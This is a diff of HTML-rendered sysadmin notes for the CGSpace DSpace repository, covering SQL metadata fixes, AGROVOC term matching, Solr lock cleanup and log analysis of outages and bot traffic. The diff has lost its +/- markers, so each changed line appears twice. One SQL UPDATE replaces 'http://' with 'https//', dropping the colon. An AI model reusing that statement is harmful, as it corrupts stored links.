$ diff --new-line-format=&#34;&#34; --unchanged-line-format=&#34;&#34; /tmp/subjects-sorted.txt /tmp/2019-02-21-matched-subjects.txt &gt; /tmp/2019-02-21-unmatched-subjects.txt
</code></pre><ul>
<li>Generate a list of countries and regions from CGSpace for Sisay to look through:</li>
</ul>
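<ul>
<li>Something like this would do it (my sketch, assuming the country and region field ids 228 and 231 that I use elsewhere in these notes):</li>
</ul>
<pre tabindex="0"><code>dspace=# \COPY (SELECT DISTINCT text_value, count(*) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 GROUP BY text_value ORDER BY count DESC) to /tmp/countries.csv WITH CSV;
</code></pre>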
@ -1129,15 +1129,15 @@ import re
import urllib
import urllib2
pattern = re.compile('^S[A-Z ]+$')
pattern = re.compile(&#39;^S[A-Z ]+$&#39;)
if pattern.match(value):
url = 'http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=' + urllib.quote_plus(value) + '&amp;lang=en'
url = &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=&#39; + urllib.quote_plus(value) + &#39;&amp;lang=en&#39;
get = urllib2.urlopen(url)
data = json.load(get)
if len(data['results']) == 1:
return &quot;matched&quot;
if len(data[&#39;results&#39;]) == 1:
return &#34;matched&#34;
return &quot;unmatched&quot;
return &#34;unmatched&#34;
</code></pre><ul>
<li>You have to make sure to URL encode the value with <code>quote_plus()</code>, and then it totally works, but it seems to refresh the facets (and therefore re-query everything) when you select a facet, which makes it basically unusable</li>
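<li>For example, a quick check of what <code>quote_plus()</code> produces (Python 2, same as the script above):</li>
</ul>
<pre tabindex="0"><code>$ python2 -c &#34;import urllib; print(urllib.quote_plus(&#39;SOIL EROSION&#39;))&#34;
SOIL+EROSION
</code></pre><ul>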
<li>There is a <a href="https://programminghistorian.org/en/lessons/fetch-and-parse-data-with-openrefine#example-2-url-queries-and-parsing-json">good resource discussing OpenRefine, Jython, and web scraping</a></li>
@ -1148,16 +1148,16 @@ return &quot;unmatched&quot;
<li>I&rsquo;m not sure how to deal with terms like &ldquo;CORN&rdquo; that are alternative labels (<code>altLabel</code>) in AGROVOC where the preferred label (<code>prefLabel</code>) would be &ldquo;MAIZE&rdquo;</li>
<li>For example, <a href="http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=CORN*&amp;lang=en">a query</a> for <code>CORN*</code> returns:</li>
</ul>
<pre tabindex="0"><code> &quot;results&quot;: [
<pre tabindex="0"><code> &#34;results&#34;: [
{
&quot;altLabel&quot;: &quot;corn (maize)&quot;,
&quot;lang&quot;: &quot;en&quot;,
&quot;prefLabel&quot;: &quot;maize&quot;,
&quot;type&quot;: [
&quot;skos:Concept&quot;
&#34;altLabel&#34;: &#34;corn (maize)&#34;,
&#34;lang&#34;: &#34;en&#34;,
&#34;prefLabel&#34;: &#34;maize&#34;,
&#34;type&#34;: [
&#34;skos:Concept&#34;
],
&quot;uri&quot;: &quot;http://aims.fao.org/aos/agrovoc/c_12332&quot;,
&quot;vocab&quot;: &quot;agrovoc&quot;
&#34;uri&#34;: &#34;http://aims.fao.org/aos/agrovoc/c_12332&#34;,
&#34;vocab&#34;: &#34;agrovoc&#34;
},
</code></pre><ul>
<li>There are dozens of other entries like &ldquo;corn (soft wheat)&rdquo;, &ldquo;corn (zea)&rdquo;, &ldquo;corn bran&rdquo;, &ldquo;Cornales&rdquo;, etc. that could potentially match, and determining whether they are related programmatically is difficult</li>
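<li>A rough way to surface these alternative labels (a sketch, assuming <code>jq</code> is installed; it keeps only results that have an <code>altLabel</code>):</li>
</ul>
<pre tabindex="0"><code>$ curl -s &#39;http://agrovoc.uniroma2.it/agrovoc/rest/v1/search?query=CORN*&amp;lang=en&#39; | jq -r &#39;.results[] | select(.altLabel) | &#34;\(.altLabel) -&gt; \(.prefLabel)&#34;&#39;
corn (maize) -&gt; maize
...
</code></pre><ul>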
@ -1239,12 +1239,12 @@ Caused by: org.apache.lucene.store.LockObtainFailedException: Lock obtain timed
at org.apache.solr.update.DefaultSolrCoreState.getIndexWriter(DefaultSolrCoreState.java:111)
at org.apache.solr.core.SolrCore.openNewSearcher(SolrCore.java:1528)
... 33 more
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2015': Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
2019-02-25 21:38:14,250 ERROR org.apache.solr.core.SolrCore @ org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2015&#39;: Unable to create core [statistics-2015] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2015/data/index/write.lock
</code></pre><ul>
<li>I tried to shut down Tomcat and remove the locks:</li>
</ul>
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr -iname &quot;*.lock&quot; -delete
# find /home/cgspace.cgiar.org/solr -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>&hellip; but the problem still occurs</li>

View File

@ -46,7 +46,7 @@ Most worryingly, there are encoding errors in the abstracts for eleven items, fo
I think I will need to ask Udana to re-copy and paste the abstracts with more care using Google Docs
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -217,7 +217,7 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
</ul>
</li>
</ul>
<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c 'Multiple update components target the same field:solr_update_time_stamp'
<pre tabindex="0"><code># journalctl -u tomcat7 | grep -c &#39;Multiple update components target the same field:solr_update_time_stamp&#39;
1076
</code></pre><ul>
<li>I restarted Tomcat and it&rsquo;s OK now&hellip;</li>
@ -238,13 +238,13 @@ $ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.x
<li>The FireOak report highlights the fact that several CGSpace collections have mixed-content errors due to the use of HTTP links in the Feedburner forms</li>
<li>I see 46 occurrences of these with this query:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE '%http://feedburner.%' OR text_value LIKE '%http://feeds.feedburner.%');
<pre tabindex="0"><code>dspace=# SELECT text_value FROM metadatavalue WHERE resource_type_id in (3,4) AND (text_value LIKE &#39;%http://feedburner.%&#39; OR text_value LIKE &#39;%http://feeds.feedburner.%&#39;);
</code></pre><ul>
<li>I can replace these globally using the following SQL:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feedburner.','https//feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feedburner.%';
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feedburner.&#39;,&#39;https//feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feedburner.%&#39;;
UPDATE 43
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, 'http://feeds.feedburner.','https//feeds.feedburner.', 'g') WHERE resource_type_id in (3,4) AND text_value LIKE '%http://feeds.feedburner.%';
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://feeds.feedburner.&#39;,&#39;https//feeds.feedburner.&#39;, &#39;g&#39;) WHERE resource_type_id in (3,4) AND text_value LIKE &#39;%http://feeds.feedburner.%&#39;;
UPDATE 44
</code></pre><ul>
<li>I ran the corrections on CGSpace and DSpace Test</li>
@ -254,7 +254,7 @@ UPDATE 44
<li>Working on tagging IITA&rsquo;s items with their new research theme (<code>cg.identifier.iitatheme</code>) based on their existing IITA subjects (see <a href="/cgspace-notes/2018-02/">notes from 2019-02</a>)</li>
<li>I exported the entire IITA community from CGSpace and then used <code>csvcut</code> to extract only the needed fields:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c 'id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]' ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
<pre tabindex="0"><code>$ csvcut -c &#39;id,cg.subject.iita,cg.subject.iita[],cg.subject.iita[en],cg.subject.iita[en_US]&#39; ~/Downloads/10568-68616.csv &gt; /tmp/iita.csv
</code></pre><ul>
<li>
<p>After importing to OpenRefine I realized that tagging items based on their subjects is tricky because of the row/record mode of OpenRefine when you split the multi-value cells as well as the fact that some items might need to be tagged twice (thus needing a <code>||</code>)</p>
@ -263,7 +263,7 @@ UPDATE 44
<p>I think it might actually be easier to filter by IITA subject, then by IITA theme (if needed), and then do transformations with some conditional values in GREL expressions like:</p>
</li>
</ul>
<pre tabindex="0"><code>if(isBlank(value), 'PLANT PRODUCTION &amp; HEALTH', value + '||PLANT PRODUCTION &amp; HEALTH')
<pre tabindex="0"><code>if(isBlank(value), &#39;PLANT PRODUCTION &amp; HEALTH&#39;, value + &#39;||PLANT PRODUCTION &amp; HEALTH&#39;)
</code></pre><ul>
<li>Then it&rsquo;s more annoying because there are four IITA subject columns&hellip;</li>
<li>In total this would add research themes to 1,755 items</li>
@ -288,11 +288,11 @@ UPDATE 44
</li>
<li>This is a bit ugly, but it works (using the <a href="https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+5">DSpace 5 SQL helper function</a> to resolve ID to handle):</li>
</ul>
<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE '%SWAZILAND%'&quot; | grep -oE '[0-9]{3,}'); do
<pre tabindex="0"><code>for id in $(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT resource_id FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228 AND text_value LIKE &#39;%SWAZILAND%&#39;&#34; | grep -oE &#39;[0-9]{3,}&#39;); do
echo &quot;Getting handle for id: ${id}&quot;
echo &#34;Getting handle for id: ${id}&#34;
handle=$(psql -U postgres -d dspacetest -h localhost -c &quot;SELECT ds5_item2itemhandle($id)&quot; | grep -oE '[0-9]{5}/[0-9]+')
handle=$(psql -U postgres -d dspacetest -h localhost -c &#34;SELECT ds5_item2itemhandle($id)&#34; | grep -oE &#39;[0-9]{5}/[0-9]+&#39;)
~/dspace/bin/dspace metadata-export -f /tmp/${id}.csv -i $handle
@ -300,7 +300,7 @@ done
</code></pre><ul>
<li>Then I couldn&rsquo;t figure out a clever way to join all the CSVs, so I just grepped them to find the IDs with dates from 2018 and 2019 and there are apparently only three:</li>
</ul>
<pre tabindex="0"><code>$ grep -oE '201[89]' /tmp/*.csv | sort -u
<pre tabindex="0"><code>$ grep -oE &#39;201[89]&#39; /tmp/*.csv | sort -u
/tmp/94834.csv:2018
/tmp/95615.csv:2018
/tmp/96747.csv:2018
@ -326,7 +326,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
</code></pre><ul>
<li>Interestingly, I see a pattern of these errors increasing, with single and double digit numbers over the past month, <del>but spikes of over 1,000 today</del>, yesterday, and on 2019-03-08, which was exactly the first time we saw this blank page error recently</li>
</ul>
<pre tabindex="0"><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-0* | awk -F: '{print $1}' | sort | uniq -c | tail -n 25
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-0* | awk -F: &#39;{print $1}&#39; | sort | uniq -c | tail -n 25
5 dspace.log.2019-02-27
11 dspace.log.2019-02-28
29 dspace.log.2019-03-01
@ -356,7 +356,7 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@55ba10b5 is c
<li>(Update on 2019-03-23 to use correct grep query)</li>
<li>There are not too many connections currently in PostgreSQL:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
10 dspaceCli
15 dspaceWeb
@ -437,13 +437,13 @@ java.util.EmptyStackException
<li>I ran DSpace&rsquo;s cleanup task on CGSpace (linode18) and there were errors:</li>
</ul>
<pre tabindex="0"><code>$ dspace cleanup -v
Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(164496) is still referenced from table &quot;bundle&quot;.
Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(164496) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (164496);&#39;
UPDATE 1
</code></pre><h2 id="2019-03-18">2019-03-18</h2>
<ul>
@ -474,7 +474,7 @@ $ wc -l 2019-03-18-subjects-unmatched.txt
<li>Create and merge a pull request to update the controlled vocabulary for AGROVOC terms (<a href="https://github.com/ilri/DSpace/pull/416">#416</a>)</li>
<li>We are getting the blank page issue on CGSpace again today and I see a <del>large number</del> of the &ldquo;SQL QueryTable Error&rdquo; in the DSpace log again (last time was 2019-03-15):</li>
</ul>
<pre tabindex="0"><code>$ grep -c 'SQL QueryTable Error' dspace.log.2019-03-1[5678]
<pre tabindex="0"><code>$ grep -c &#39;SQL QueryTable Error&#39; dspace.log.2019-03-1[5678]
dspace.log.2019-03-15:929
dspace.log.2019-03-16:67
dspace.log.2019-03-17:72
@ -482,9 +482,9 @@ dspace.log.2019-03-18:1038
</code></pre><ul>
<li>Though WTF, this grep seems to be giving weird inaccurate results actually, and the real number of errors is much lower if I exclude the &ldquo;binary file matches&rdquo; result with <code>-I</code>:</li>
</ul>
<pre tabindex="0"><code>$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-18 | wc -l
<pre tabindex="0"><code>$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-18 | wc -l
8
$ grep -I 'SQL QueryTable Error' dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: '{print $1}' | sort | uniq -c
$ grep -I &#39;SQL QueryTable Error&#39; dspace.log.2019-03-{08,14,15,16,17,18} | awk -F: &#39;{print $1}&#39; | sort | uniq -c
9 dspace.log.2019-03-08
25 dspace.log.2019-03-14
12 dspace.log.2019-03-15
@ -504,22 +504,22 @@ java.sql.SQLException: Connection org.postgresql.jdbc.PgConnection@75eaa668 is c
</code></pre><ul>
<li>There is a low number of connections to PostgreSQL currently:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | wc -l
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | wc -l
33
$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
6 dspaceApi
7 dspaceCli
15 dspaceWeb
</code></pre><ul>
<li>I looked in the PostgreSQL logs, but all I see are a bunch of these errors going back two months to January:</li>
</ul>
<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &quot;waiting&quot; does not exist at character 217
<pre tabindex="0"><code>2019-01-13 06:25:13.062 CET [9157] postgres@template1 ERROR: column &#34;waiting&#34; does not exist at character 217
</code></pre><ul>
<li>This is unrelated and apparently due to <a href="https://github.com/munin-monitoring/munin/issues/746">Munin checking a column that was changed in PostgreSQL 9.6</a></li>
<li>I suspect that this issue with the blank pages might not be PostgreSQL after all, perhaps it&rsquo;s a Cocoon thing?</li>
<li>Looking in the cocoon logs I see a large number of warnings about &ldquo;Can not load requested doc&rdquo; around 11AM and 12PM:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-18 | grep -oE '2019-03-18 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-18 | grep -oE &#39;2019-03-18 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-18 00:
6 2019-03-18 02:
3 2019-03-18 04:
@ -535,7 +535,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And a few days ago on 2019-03-15, the last time it happened, it was in the afternoon, and the same pattern occurs then around 12PM:</li>
</ul>
<pre tabindex="0"><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-15.xz | grep -oE '2019-03-15 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-15.xz | grep -oE &#39;2019-03-15 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-15 01:
3 2019-03-15 02:
1 2019-03-15 03:
@ -561,7 +561,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
</code></pre><ul>
<li>And again on 2019-03-08, surprise surprise, it happened in the morning:</li>
</ul>
<pre tabindex="0"><code>$ xzgrep 'Can not load requested doc' cocoon.log.2019-03-08.xz | grep -oE '2019-03-08 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ xzgrep &#39;Can not load requested doc&#39; cocoon.log.2019-03-08.xz | grep -oE &#39;2019-03-08 [0-9]{2}:&#39; | sort | uniq -c
11 2019-03-08 01:
3 2019-03-08 02:
1 2019-03-08 03:
@ -581,7 +581,7 @@ $ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|ds
<li>I found a handful of AGROVOC subjects that use a non-breaking space (0x00a0) instead of a regular space, which makes for pretty confusing debugging&hellip;</li>
<li>I will replace these in the database immediately to save myself the headache later:</li>
</ul>
<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ '.+\u00a0.+';
<pre tabindex="0"><code>dspace=# SELECT count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ &#39;.+\u00a0.+&#39;;
count
-------
84
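-- a sketch of the replacement (mine, not from the original session): collapse the non-breaking spaces
dspace=# UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;\u00a0&#39;, &#39; &#39;, &#39;g&#39;) WHERE resource_type_id=2 AND metadata_field_id = 57 AND text_value ~ &#39;.+\u00a0.+&#39;;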
@ -630,7 +630,7 @@ Max realtime timeout unlimited unlimited us
<li>For now I will just stop Tomcat, delete Solr locks, then start Tomcat again:</li>
</ul>
<pre tabindex="0"><code># systemctl stop tomcat7
# find /home/cgspace.cgiar.org/solr/ -iname &quot;*.lock&quot; -delete
# find /home/cgspace.cgiar.org/solr/ -iname &#34;*.lock&#34; -delete
# systemctl start tomcat7
</code></pre><ul>
<li>After restarting I confirmed that all Solr statistics cores were loaded successfully&hellip;</li>
@ -660,10 +660,10 @@ Max realtime timeout unlimited unlimited us
<ul>
<li>It&rsquo;s been two days since we had the blank page issue on CGSpace, and looking in the Cocoon logs I see very low numbers of the errors that we were seeing the last time the issue occurred:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-20 | grep -oE '2019-03-20 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-20 | grep -oE &#39;2019-03-20 [0-9]{2}:&#39; | sort | uniq -c
3 2019-03-20 00:
12 2019-03-20 02:
$ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-21 | grep -oE &#39;2019-03-21 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-21 00:
1 2019-03-21 02:
4 2019-03-21 03:
@ -704,7 +704,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
<ul>
<li>CGSpace (linode18) is having the blank page issue again and it seems to have started last night around 21:00:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 [0-9]{2}:&#39; | sort | uniq -c
2 2019-03-22 00:
69 2019-03-22 01:
1 2019-03-22 02:
@ -727,7 +727,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-21 | grep -oE '2019-03-21
323 2019-03-22 21:
685 2019-03-22 22:
357 2019-03-22 23:
$ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23 [0-9]{2}:' | sort | uniq -c
$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-23 | grep -oE &#39;2019-03-23 [0-9]{2}:&#39; | sort | uniq -c
575 2019-03-23 00:
445 2019-03-23 01:
518 2019-03-23 02:
@ -742,7 +742,7 @@ $ grep 'Can not load requested doc' cocoon.log.2019-03-23 | grep -oE '2019-03-23
<li>I was curious to see if clearing the Cocoon cache in the XMLUI control panel would fix it, but it didn&rsquo;t</li>
<li>Trying to drill down more, I see that the bulk of the errors started around 21:20:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-22 | grep -oE '2019-03-22 21:[0-9]' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-22 | grep -oE &#39;2019-03-22 21:[0-9]&#39; | sort | uniq -c
1 2019-03-22 21:0
1 2019-03-22 21:1
59 2019-03-22 21:2
@ -850,12 +850,12 @@ org.postgresql.util.PSQLException: This statement has been closed.
<ul>
<li>Could be an error in the docs, as I see the <a href="https://commons.apache.org/proper/commons-dbcp/configuration.html">Apache Commons DBCP</a> has -1 as the default</li>
<li>Maybe I need to re-evaluate the &ldquo;defaults&rdquo; of Tomcat 7&rsquo;s DBCP and set them explicitly in our config</li>
<li>From Tomcat 8 they seem to default to Apache Commons' DBCP 2.x</li>
<li>From Tomcat 8 they seem to default to Apache Commons&rsquo; DBCP 2.x</li>
</ul>
</li>
<li>Also, CGSpace doesn&rsquo;t have many Cocoon errors yet this morning:</li>
</ul>
<pre tabindex="0"><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-25 | grep -oE &#39;2019-03-25 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-25 00:
1 2019-03-25 01:
</code></pre><ul>
@ -869,7 +869,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
<li>Uptime Robot reported that CGSpace went down and I see the load is very high</li>
<li>The top IPs around the time in the nginx API and web logs were:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
9 190.252.43.162
12 157.55.39.140
18 157.55.39.54
@ -880,7 +880,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
36 157.55.39.9
50 52.23.239.229
2380 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
354 18.195.78.144
363 190.216.179.100
386 40.77.167.185
@ -898,23 +898,23 @@ org.postgresql.util.PSQLException: This statement has been closed.
</code></pre><ul>
<li>Surprisingly they are re-using their Tomcat session:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74&#39; dspace.log.2019-03-25 | sort | uniq | wc -l
1
</code></pre><ul>
<li>That&rsquo;s weird because the total number of sessions today seems low compared to recent days:</li>
</ul>
<pre tabindex="0"><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-25 | sort -u | wc -l
5657
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-24 | sort -u | wc -l
17710
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-23 | sort -u | wc -l
17179
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-22 | sort -u | wc -l
7904
</code></pre><ul>
<li>PostgreSQL seems to be pretty busy:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
11 dspaceApi
10 dspaceCli
67 dspaceWeb
@ -931,7 +931,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>UptimeRobot says CGSpace went down again and I see the load is again at 14.0!</li>
<li>Here are the top IPs in nginx logs in the last hour:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 35.174.184.209
3 66.249.66.81
4 104.198.9.108
@ -942,7 +942,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
414 45.5.184.72
535 45.5.186.2
2014 205.186.128.185
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 41.204.190.40
160 18.194.46.84
160 54.70.40.11
@ -960,7 +960,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I will add these three to the &ldquo;bad bot&rdquo; rate limiting that I originally used for Baidu</li>
<li>Going further, these are the IPs making requests to Discovery and Browse pages so far today:</li>
</ul>
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;(discover|browse)&quot; | grep -E &quot;26/Mar/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;(discover|browse)&#34; | grep -E &#34;26/Mar/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
120 34.207.146.166
128 3.91.79.74
132 108.179.57.67
@ -978,7 +978,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)</li>
<li>Looking at the database usage I&rsquo;m wondering why there are so many connections from the DSpace CLI:</li>
</ul>
<pre tabindex="0"><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
